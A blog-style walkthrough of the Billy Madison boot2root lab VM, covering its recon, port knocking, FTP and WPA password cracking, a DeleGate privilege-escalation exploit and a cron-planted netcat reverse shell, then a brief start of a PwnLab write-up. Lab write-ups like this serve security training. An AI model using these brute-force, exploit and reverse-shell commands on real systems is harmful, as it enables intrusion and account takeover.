I was browsing Twitter one afternoon and saw that @7minsec was looking for testers for his next boot2root challenge, based on the movie Billy Madison. Since I thoroughly enjoyed his first CTF (Tommy Boy) I jumped at the opportunity.

Recon

As always, we start off with a super stealthy nmap scan.

Nmap scan report for 192.168.110.181
Host is up (0.00020s latency).
Not shown: 65526 filtered ports

PORT     STATE  SERVICE     VERSION
22/tcp   open   tcpwrapped
23/tcp   open   telnet?
69/tcp   open   http        BaseHTTPServer
80/tcp   open   http        Apache httpd 2.4.18 
139/tcp  open   netbios-ssn Samba smbd 3.X 
445/tcp  open   netbios-ssn Samba smbd 3.X 
2525/tcp open   smtp

Grabbing the source of the index page on port 80 we can see that Billy’s PC has been take over and we must unlock it and recover his final paper before time is up! I also took a look at the eric.php page, which came to find out later is a troll to block directory bruteforcing with tools such as dirbuster.

root@mrb3n:~# curl -s http://192.168.110.181
<TITLE>Oh nooooooo!</TITLE>
<html>
<p>
<center><h1> UH OH!</h1></center>
<p>
<center><img src="eric-tongue-animated.gif"></center>
<p>
<center><h1>Silly Billy!!!</h1></center>
<p>
<center><h3>If you're reading this, you clicked on the link I sent you.  OH NOES!  Your computer's all locked up, and now you can't get access to your final 12th grade assignment you've been working so hard on!  You need that to graduate, Billy Boy!!</h3></center>
<p>
<center><h3>Now all I have to do is sit and wait for a while and...</h3></center>
<p>
<center><img src="hotels.gif"></center>
<p> 
<center><h2>I bet this is you right now:</h2></center>
<p>
<center><img src="billy-mad.png"><img src="billy-mad.png"><img src="billy-mad.png"></center>
<P>
<p><center><h2>Think you can get your computer unlocked and recover your final paper before time runs out and you FAAAAIIIILLLLL?????</h2></center>
<p>
<center>Good luck, schmuck.</center>
<p>
</html>

I pulled down all of the images for offline analysis as they often contain valuable information during CTFs but I did not uncover anything useful.

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/billy-mad.png
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  225k  100  225k    0     0  18.5M      0 --:--:-- --:--:-- --:--:-- 19.9M

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/hotels.gif
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  329k  100  329k    0     0  53.6M      0 --:--:-- --:--:-- --:--:-- 64.4M

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/eric-tongue-animated.gif
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  440k  100  440k    0     0  26.1M      0 --:--:-- --:--:-- --:--:-- 26.8M

Having exhausted my options on the web app for the time being I checked out what was going on with the telnet port. I was greeted with a friendly ban notice (confirmed on a re-connection attempt) as well as my first hint at a password (possibly ROT).

root@mrb3n:~/Desktop/billymadison# telnet 192.168.110.181
Trying 192.168.110.181...
Connected to 192.168.110.181.
Escape character is '^]'.
****** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****
Connection closed by foreign host.

Port 69 was hosting a WordPress site. I enumerated a bit with WPScan and ultimately hit a wall. Once on the box I confirmed that this was an intentional honeypot by the author.

root@mrb3n:~# wpscan --url http://192.168.110.181:69 --enumerate u
WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]n
The plugins directory 'wp-content/plugins' does not exist.
You can specify one per command line option (don't forget to include the wp-content directory if needed)
[?] Continue? [Y]es [N]o, default: [N]
y
[+] URL: http://192.168.110.181:69/
[+] Started: Thu Aug 25 11:33:21 2016

[!] The WordPress 'http://192.168.110.181:69/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: MadisonHotelsWordpress
[+] XML-RPC Interface available under: http://192.168.110.181:69/xmlrpc.php

[+] WordPress version 1.0 identified from meta generator

[+] WordPress theme in use: twentyeleven

[+] Name: twentyeleven
 |  Location: http://192.168.110.181:69/wp-content/themes/twentyeleven/
 |  Readme: http://192.168.110.181:69/wp-content/themes/twentyeleven/readme.txt
 |  Changelog: http://192.168.110.181:69/wp-content/themes/twentyeleven/changelog.txt
 |  Style URL: http://192.168.110.181:69/wp-content/themes/twentyeleven/style.css
 |  Referenced style.css: http://192.168.110.181:69/static/wp-content/themes/twentyeleven/style.css
 |  Description: 

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[!] Stop User Enumeration plugin detected, results might be empty. However a bypass exists for v1.2.8 and below, see stop_user_enumeration_bypass.rb in /usr/share/wpscan
[+] We did not enumerate any usernames

[+] Finished: Thu Aug 25 11:33:22 2016
[+] Requests Done: 62
[+] Memory used: 7.863 MB
[+] Elapsed time: 00:00:00

Next I fired up enum4linux to see what I could uncover on our SMB port. The scan returned an open share (with anonymous access) as well as 3 local users.

root@mrb3n:~/Desktop/billymadison# enum4linux -a 192.168.110.181
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Aug 25 11:23:27 2016

 ============================================ 
|    Share Enumeration on 192.168.110.181    |
 ============================================ 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

	Sharename       Type      Comment
	---------       ----      -------
	EricsSecretStuff Disk      
	IPC$            IPC       IPC Service (BM)

	Server               Comment
	---------            -------
	BM                   BM

	Workgroup            Master
	---------            -------
	WORKGROUP            BM

[+] Attempting to map shares on 192.168.110.181
//192.168.110.181/EricsSecretStuff	Mapping: OK, Listing: OK
//192.168.110.181/IPC$	Mapping: OK	Listing: DENIED


========================================================================== 
|    Users on 192.168.110.181 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-4111762292-2429122530-3796655328
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ' '

S-1-22-1-1000 Unix User\billy (Local User)
S-1-22-1-1001 Unix User\veronica (Local User)
S-1-22-1-1002 Unix User\eric (Local User)

Connecting to the Samba share I pulled down the files listed. The ebd.txt file stated that the backdoor was closed, more on that later.

root@mrb3n:~# smbclient //192.168.110.181/EricsSecretStuff -u anonymous
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Thu Aug 25 10:16:19 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       35  Thu Aug 25 10:16:19 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

59164 blocks of size 524288. 50914 blocks available

smb: \> get ebd.txt 
getting file \ebd.txt of size 35 as ebd.txt (5.7 KiloBytes/sec) (average 5.7 KiloBytes/sec)
smb: \> get ._.DS_Store 
getting file \._.DS_Store of size 4096 as ._.DS_Store (1000.0 KiloBytes/sec) (average 403.4 KiloBytes/sec)
smb: \> get .DS_Store 
getting file \.DS_Store of size 6148 as .DS_Store (1200.8 KiloBytes/sec) (average 669.2 KiloBytes/sec)

root@mrb3n:~/Desktop/billymadison# cat ebd.txt 

Erics backdoor is currently CLOSED

The string ‘Rkfpuzrahngvat’ obtained from the telnet connection earlier was interesting and appeared to be some sort of encrypted or ciphered text. In the end it proved to be ROT13, decrypting to ‘exschmenuating’. I tried this in various combinations of username and password without success. Eventually I took a long shot and attempted it as a page name and got a hit! Eric’s admin console!

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/

<TITLE>Eric's Admin Console 1.0</TITLE>
<html>
<h1>"Ruin Billy Madison's Life" - Eric's notes</h1>
<p>
<center><h1>08/01/16</h1></center>
Looks like Principal Max is too much of a goodie two-shoes to help me ruin Billy Boy's life.  Will ponder other victims.

<center><h1>08/02/16</h1></center>
Ah!  Genius thought!  Billy's girlfriend Veronica uses his machine too.  I might have to cook up a phish and see if I can't get her to take the bait.

<center><h2>08/03/16</h2></center>
OMg LOL LOL LOL!!!  What a twit - I can't believe she fell for it!!  I .captured the whole thing in this folder for later lulz.  I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks!

Anyway, malware installation successful.  I'm now in complete control of Bill's machine!

<center>
<center><h1>Log monitor</h1></center>
<p>
<center>This will help me keep an eye on Billy's attempt to free his machine from my wrath.</center>
<p>
<center><a href="currently-banned-hosts.txt">View log</a>
<p>
</html>

Checking out the ‘currently-banned-hosts.txt’ file confirms that I have been banned multiple times while trying to connect via telnet. The file also offers a hint to reset the VM to remove the ban.

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/currently-banned-hosts.txt
---
2016-08-25-13-59-01
Hosts currently banned
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.
---
Chain INPUT (policy DROP)
DROP       all  --  192.168.110.179      anywhere            
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.

I reset the VM and checked the ban list again.

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/currently-banned-hosts.txt
---
2016-08-25-14-08-01
Hosts currently banned
Chain INPUT (policy DROP)
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.
---

From the clue on the page above it seems like I may be looking for a packet capture file with ‘veronica’ in the file name. I tried many combinations, ultimately finding the file with a combination of a custom wordlist based on rockyou.txt and wfuzz.

root@mrb3n:~/Desktop/billymadison# cat /root/rockyou.txt | grep veronica > veronica.txt

root@mrb3n:~/Desktop/billymadison# wfuzz  -c -z file,/root/Desktop/billymadison/veronica.txt --hc 404 http://192.168.110.181/exschmenuating/FUZZ.cap 
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.110.181/exschmenuating/FUZZ.cap
Total requests: 773

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

00521:  C=400     10 L	      35 W	    307 Ch	  "veronica$%"
00716:  C=200    192 L	     722 W	   8700 Ch	  "012987veronica"
00723:  C=200     24 L	     135 W	    940 Ch	  "#0104veronica"

Total time: 0.705309
Processed Requests: 773
Filtered Requests: 770
Requests/sec.: 1095.972

We are able to analyze packet capture files using the tshark command line utility. A quick bash script will pull out all separate TCP steams into .txt files.

for stream in `tshark -r 012987veronica.cap -T fields -e tcp.stream | sort -n | uniq`
do
    echo $stream
    tshark -r 012987veronica.cap -w stream-$stream.cap -Y "tcp.stream==$stream"
done

The packet capture contained 6 separate email messages.

Message 1

Date: Sat, 20 Aug 2016 21:56:50 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica, 

Eric Gordon here.  

I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users.  Just <a href="http://areallyreallybad.malware.edu.org.ru/f3fs0azjf.php">click here</a> to install it, k?  

Thanks. -Eric

Message 2

Date: Sat, 20 Aug 2016 21:57:00 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.



-VV

Message 3

Date: Sat, 20 Aug 2016 21:57:11 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect.  Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

-Eric

Message 4

Date: Sat, 20 Aug 2016 21:57:31 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that.  Thanks!

-Eric

Message 5

Date: Sat, 20 Aug 2016 21:57:21 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V

Message 6

Date: Sat, 20 Aug 2016 21:57:41 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird.  The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff.  I'm going to send this email to you and then shut the computer down.  I have some important files I'm worried about, and Billy's working on his big 12th grade final.  I don't want anything to happen to that!

-V

There is a lot of information here but the most important being in messages 2 and 3. The “Spanish Armada” combo is message 2 alludes to port knocking. In the YouTube clip provided Billy guesses the year of Spanish Armada is the following sequence: 1466, 1467, 1469, 1514, 1981, 1986. However, listening carefully he actually says “67” not 1467. We can use nmap for some port knocking with the combo provided.

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 192.168.110.181; done

Once completed I checked and sure enough port 21 was now open. Logging in with the credentials provided in message 3 provided our next clue.

The FTP directory contained a notes file as well as various exploits from exploit.db for Ubuntu 16.04 which were likely trolls, but I saved them for later just in case.

root@mrb3n:~/Desktop/billymadison# ftp 192.168.72.155
Connected to 192.168.72.155.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (192.168.72.155:root): eric
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 6326 Aug 20 12:49 40049
-rwxrwxrwx 1 ftp 9132 Aug 20 12:49 40054
-rwxrwxrwx 1 ftp 1287 Aug 20 12:49 9129
-rwxrwxrwx 1 ftp 740 Aug 22 21:18 .notes
-rwxrwxrwx 1 ftp 5367 Aug 20 12:49 39772
-rwxrwxrwx 1 ftp 5208 Aug 20 12:49 39773

The .notes file refers to the privilege escalation explanations, one of them being backwards (more on that later) as well as a hint at how to open Eric’s backdoor and a mention of Billy and Veronica’s account passwords.

root@mrb3n:~/Desktop/billymadison# cat .notes 
Ugh, this is frustrating.  

I managed to make a system account for myself. I also managed to hide Billy's paper
where he'll never find it.  However, now I can't find it either :-(. 
To make matters worse, my privesc exploits aren't working.  
One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it) 
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  
All I need to do is send an email that includes
the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm
sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to
check Veronica's.

-EG

From some earlier testing I knew that I could send emails over port 2525 via telnet and the email file would be accessible in the EricsSecretStuff Samba directory. I crafted an email with the phrase “My kid will be a soccer player” in the body, waited a bit and checked. Sure enough the ebd file now stated that the backdoor was open.

root@mrb3n:~/Desktop/billymadison# telnet 192.168.72.155 2525
Trying 192.168.72.155...
Connected to 192.168.72.155.
Escape character is '^]'.
220 BM ESMTP SubEthaSMTP null
MAIL FROM: vvaugh@polyfector.edu
250 Ok
RCPT TO: eric@madisonhotels.com
250 Ok
DATA
354 End data with <CR><LF>.<CR><LF>

SUBJECT: email

My kid will be a soccer player

.
250 Ok

Email received

root@mrb3n:~# smbclient //192.168.72.155/EricsSecretStuff
Enter root's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Fri Aug 26 10:57:38 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  260816095738178.eml                 N       95  Fri Aug 26 10:57:38 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       53  Fri Aug 26 11:00:01 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

		59164 blocks of size 524288. 50881 blocks available
smb: \> get 260816095738178.eml 
getting file \260816095738178.eml of size 95 as 260816095738178.eml (30.9 KiloBytes/sec) (average 30.9 KiloBytes/sec)
smb: \> ^Z
[1]+  Stopped                 smbclient //192.168.72.155/EricsSecretStuff
root@mrb3n:~# cat 260816095738178.eml 
        Fri, 26 Aug 2016 09:57:14 -0500 (CDT)

SUBJECT: email

My kid will be a soccer player

Backdoor now open.

root@mrb3n:~# cat ebd.txt 
2016-08-26-10-03-01
Erics backdoor is currently OPEN

Another nmap scan shows us a newly opened port 1974.

PORT     STATE  SERVICE
22/tcp   open   ssh
23/tcp   open   telnet
69/tcp   open   tftp
80/tcp   open   http
137/tcp  closed netbios-ns
138/tcp  closed netbios-dgm
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
1974/tcp open   drp
2525/tcp open   ms-v-worlds

Scanning port 1974 revealed that the backdoor was an SSH client.

root@mrb3n:~# nmap -sV -p 1974 192.168.72.155

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-08-26 11:43 EDT
Nmap scan report for 192.168.72.155
Host is up (0.00062s latency).
PORT     STATE SERVICE VERSION
1974/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:44:13:0E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We now have an SSH client, a username (eric) but no password. Reading back through the hints we see that there must be a user account for billy or veronica on one of the previously opened services. Since we have a previously generated wordlist for Veronica I gave it a go with ncrack against the FTP service.

root@mrb3n:~/Desktop/billymadison# ncrack -u veronica -P veronica.txt -T 5 192.168.72.155 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2016-08-26 11:59 EDT

Discovered credentials for ftp on 192.168.72.155 21/tcp:
192.168.72.155 21/tcp ftp: 'veronica' 'babygirl_veronica07@yahoo.com'

Ncrack done: 1 service scanned in 188.98 seconds.

Logging into the FTP as Veronica we have another email and another packet capture file. **Note you have to make sure to switch to binary mode once logged into the FTP or the packet capture file will not download properly.

root@mrb3n:~/Desktop/billymadison# ftp 192.168.72.155
Connected to 192.168.72.155.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (192.168.72.155:root): veronica
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 595 Aug 20 12:55 email-from-billy.eml
-rwxrwxrwx 1 ftp 719128 Aug 17 12:16 eg-01.cap

The email talks about cracking Eric’s wireless password and sure enough the packet capture file is encrypted 802.11 wireless traffic.

root@mrb3n:~/Desktop/billymadison# cat email-from-billy.eml 
        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. 🙂

Kisses,

Billy

Armed with our packet capture file and the trusty rockyou.txt wordlist I set to work attempting to crack Eric’s wireless password using aircrack-ng. Some 30 minutes later and I had a hit.

root@mrb3n:~/Desktop/billymadison# aircrack-ng eg-01.cap -w /root/rockyou.txt 
Opening eg-01.cap
Read 13003 packets.

   #  BSSID              ESSID                     Encryption

   1  02:13:37:A5:52:2E  EricGordon                WPA (1 handshake)

Choosing first network as target.

Opening eg-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc3


                   [00:32:35] 1699628 keys tested (897.71 k/s))


                           KEY FOUND! [ triscuit* ]


      Master Key     : 9E 8B 4F E6 CC 5E E2 4C 46 84 D2 AF 59 4B 21 6D 
                       B5 3B 52 84 04 9D D8 D8 83 67 AF 43 DC 60 CE 92 

      Transient Key  : 7A FA 82 59 5A 9A 23 6E 8C FB 1D 4B 4D 47 BE 13 
                       D7 AC AC 4C 81 0F B5 A2 EE 2D 9F CC 8F 05 D2 82 
                       BF F4 4E AE 4E C9 ED EA 31 37 1E E7 29 10 13 92 
                       BB 87 8A AE 70 95 F8 62 20 B5 2B 53 8D 0C 5C DC 

      EAPOL HMAC     : 86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33

Finally, after all this time I had a shell. Logging in with eric’s credentials I was on to the next step.

root@mrb3n:~/Desktop/billymadison# ssh eric@192.168.72.155 -p 1974
eric@192.168.72.155's password: 
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-34-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

12 packages can be updated.
0 updates are security updates.


Last login: Sat Aug 20 22:28:28 2016 from 192.168.3.101
eric@BM:~$ 


eric@BM:~$ cat why-1974.txt 
Why 1974?  Because: http://www.metacafe.com/watch/an-VB9KuJtnh4bn/billy_madison_1995_billy_hangs_out_with_friends/

Beware of trolls!

The author took care to plant many trolls throughout the file system as well as some programs and files to give the appearance of an actual workstation.

eric@BM:/opt/coloradoftp-prime/home/anonymous$ cat Billys-12th-grade-final-project.doc 
HHAHAAHAHAH I CAN'T BELIEVE YOU ACTUALLY THOUGHT THIS WAS IT!!!!  WHAT A LOSER! Why don't you go pass
out by the pool for another hour!

-EG

I guess billy works as a pentester?

eric@BM:/opt# ls
bpatty             fakesmtp    reconng  Sn1per   wp
coloradoftp-prime  honeyports  rg       testssl

Privilege escalation

I spent a great deal of time enumerating the file system. I could see that billy had sudo privileges and a directory named ‘/PRIVATE’, owned by root. At this point I knew that I had to become root to move forward. None of the privilege escalation exploits alluded to in the FTP directory worked nor was I was to guess billy’s password.

I performed all the normal checks for world-writeable files, SUID and GUID binaries and one stood out.

root@BM:/opt/bpatty# find / -perm -2000 -type f 2>/dev/null
/usr/local/share/sgml/donpcgd
/usr/bin/chage
/usr/bin/wall
/usr/bin/screen
/usr/bin/mlocate
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/bsd-write
/usr/bin/at
/usr/bin/ssh-agent
/usr/lib/x86_64-linux-gnu/utempter/utempter
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd

The binary in /usr/local/share/sgml appeared out of place. I pulled it down, opened it in IDA and confirmed that it was not a custom binary made for this challenge. Backing up to the hint about some of the exploits being backwards. If we reverse the name of this binary to “dgcpond” we have a likely candidate for local privilege escalation in DeleGate v9.9.13 (https://www.exploit-db.com/exploits/39134) which sets some binaries as SUID root (in this case GUID).  Per the explanation the “dgcpond” binary creates a node allowing for a local, unprivileged user, to create files anywhere on the disk. Meaning we can create a file in ANY directory (even those owned by root). Creating a shell script in the /etc/cron.hourly directory should help us to escalate privileges as any executable shell scripts in that directory will be run as root at 17 minutes past every hour.

Modifying the exploit syntax a bit a created an hourly cron to send me a reverse shell using mknod.

eric@BM:/usr/local/share/sgml$ touch /tmp/rootme; chmod +x /tmp/rootme; ./donpcgd /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n mknod /tmp/backpipe p; nc 192.168.72.154 8443 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe' > /etc/cron.hourly/rootme
#### mknod(/etc/cron.hourly/root,81fd,0)

I confirmed that the hourly cron job had been created, set up my listener and waited.

eric@BM:/etc/cron.hourly$ cat rootme
#!/bin/bash 
 mknod /tmp/backpipe p; nc 192.168.72.154 8443 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe

I checked back after 17 past the next hour and I had a hit on my listener. A root shell!

root@mrb3n:~# nc -lvnp 8443
listening on [any] 8443 ...
connect to [192.168.72.154] from (UNKNOWN) [192.168.72.155] 58066
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux BM 4.4.0-34-generic #53-Ubuntu SMP Wed Jul 27 16:06:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
python -c 'import pty;pty.spawn("/bin/bash")'

root@BM:/#

Establishing persistence

Even after obtaining a better working tty the shell was a big sluggish. I decided to be a bit dirty and change billy’s password since I knew that he had sudo privileges. After changing his password I logged back in via SSH and things were much more stable.

root@BM:/# passwd billy
pswd billy
Enter new UNIX password: billy
Retype new UNIX password: billy

Checking out the root directory I found all of the shell scripts the author had carefully set up to troll us/keep us on track. Nicely done!

root@BM:~# ls
checkban    ebd.sh   email.sh  fwconfig.sh  ssh.sh      telnet.sh
cleanup.sh  ebd.txt  ftp.sh    ssh          startup.sh  wp.sh

PRIVATE

Moving over to the /PRIVATE directory I found a hint file as well as an unknown file which later proved to be a Truecrypt volume based on the hint “truely cracks me up”.

root@BM:/PRIVATE# ls -lah
total 1.1M
drwx------  2 root  root  4.0K Aug 21 16:45 .
drwxr-xr-x 25 root  root  4.0K Aug 20 13:59 ..
-rw-rw-r--  1 billy billy 1.0M Aug 21 16:42 BowelMovement
-rw-r--r--  1 root  root   191 Aug 21 16:45 hint.txt


root@BM:/PRIVATE# cat hint.txt 
Heh, I called the file BowelMovement because it has the same initials as
Billy Madison.  That truely cracks me up!  LOLOLOL!

I always forget the password, but it's here:

https://en.wikipedia.org/wiki/Billy_Madison

-EG

I pulled the truecrypt volume down locally and created  a wordlist using cewl and the Wikipedia link provided.

root@mrb3n:~/Desktop/billymadison# cewl -v en.wikipedia.org/wiki/Billy_Madison -d 1 -w billy_madison.txt

When using cewl and Wikipedia to create wordlists we are left with lots of junk. The following command can be used to clean things up a bit.

root@mrb3n:~/Desktop/billymadison# cat billy_madison.txt | grep "\w\{7,\}" | grep -v "^wg" | head -n -50 > short_billy_madison.txt

Next I fired up truecrack against the truecrypt volume using the shiny new wordlist. 236 attempts in and we had a hit.

root@mrb3n:~/Desktop/billymadison# truecrack -t BowelMovement -w /root/rockyou.txt -v

231	inspired	NO
232	ignores		NO
233	initially	NO
234	calling		NO
235	execrable	YES
Found password:		"execrable"
Password length:	"10"
Total computations:	"236"

Now I had a password but I still had to mount the Truecrypt volume to see what the author had in store for us next. Kali Linux comes with cryptsetup which can be used to access a truecrypt container if we don’t have truecrypt installed. The following command will open the truecrypt container (after we enter the password).

root@mrb3n:~/Desktop/billymadison# cryptsetup open --type tcrypt /root/Desktop/billymadison/BowelMovement billy
Enter passphrase: 

Once open, we can mount the truecrypt container at a mountpoint of our choosing.

root@mrb3n:~/Desktop/billymadison# mount -t vfat /dev/mapper/billy /root/Desktop/billymadison/BowelMovement 

Browsing to the mountpoint I was presented with another zip file as well as a .doc file containing Billy’s final project. My heart sank for a moment, wondering what additional final password cracking challenge the author had in store. Lucky for us he was gracious enough to give up the final flag without a fight.

root@mrb3n:/media/root/4ED7-715F# unzip secret.zip 
Archive:  secret.zip
  inflating: Billy_Madison_12th_Grade_Final_Project.doc  
  inflating: THE-END.txt

The End

root@mrb3n:/media/root/4ED7-715F# cat THE-END.txt 
Congratulations!

If you're reading this, you win!

I hope you had fun.  I had an absolute blast putting this together.

I'd love to have your feedback on the box - or at least know you pwned it!

Please feel free to shoot me a tweet or email (7ms@7ms.us) and let me know with
the subject line: "Stop looking at me swan!"

Thanks much,

Brian Johnson
7 Minute Security
www.7ms.us

Billy Madison 12th Grade Final Project

Billy Madison
Final Project
Knibb High

                                       The Industrial Revolution

The Industrial Revolution to me is just like a story I know called "The Puppy Who Lost His Way." 
The world was changing, and the puppy was getting... bigger.

So, you see, the puppy was like industry. In that, they were both lost in the woods.
And nobody, especially the little boy - "society" - knew where to find 'em. 
Except that the puppy was a dog. 
But the industry, my friends, that was a revolution.

KNIBB HIGH FOOTBALL RULES!!!!!



-BM

Final thoughts

This boot2root was a ton of fun and brought my back to my childhood watching classic Adam Sandler movies. The author definitely upped the challenge from his previous Tommy Boy VM and presented us with a highly polished, well thought out scenario which required iterative/out-of-the-box thinking as well as chaining together a variety of tactics and tools.

Thanks to and props to @7minsec for putting together another great challenge and, as always, thank you to @g0tmi1k for keeping the #vulnhub community up and running.

It has been raining VMs lately over at vulnhub.com.

The latest, PwnLab: init, can be obtained here: https://www.vulnhub.com/entry/pwnlab-init,158/

Like 6Days Lab this had another fun web challenge.

As always, I started out with a super stealthy nmap scan 😉 .

Interesting, we have port 80 and 3306 (MySQL) open.

I fired up Hydra to attempt to brute force the MySQL login (because why not) and then loaded up the web application.

I spent quite some time here, attempted to brute force the login, checked for SQL injection, all to no avail.  The ‘page’ parameter on the main page looked ripe for LFI but all attempts thus far had failed. After some extensive research I came across this post which looked extremely promising and was very well researched and written:

https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/

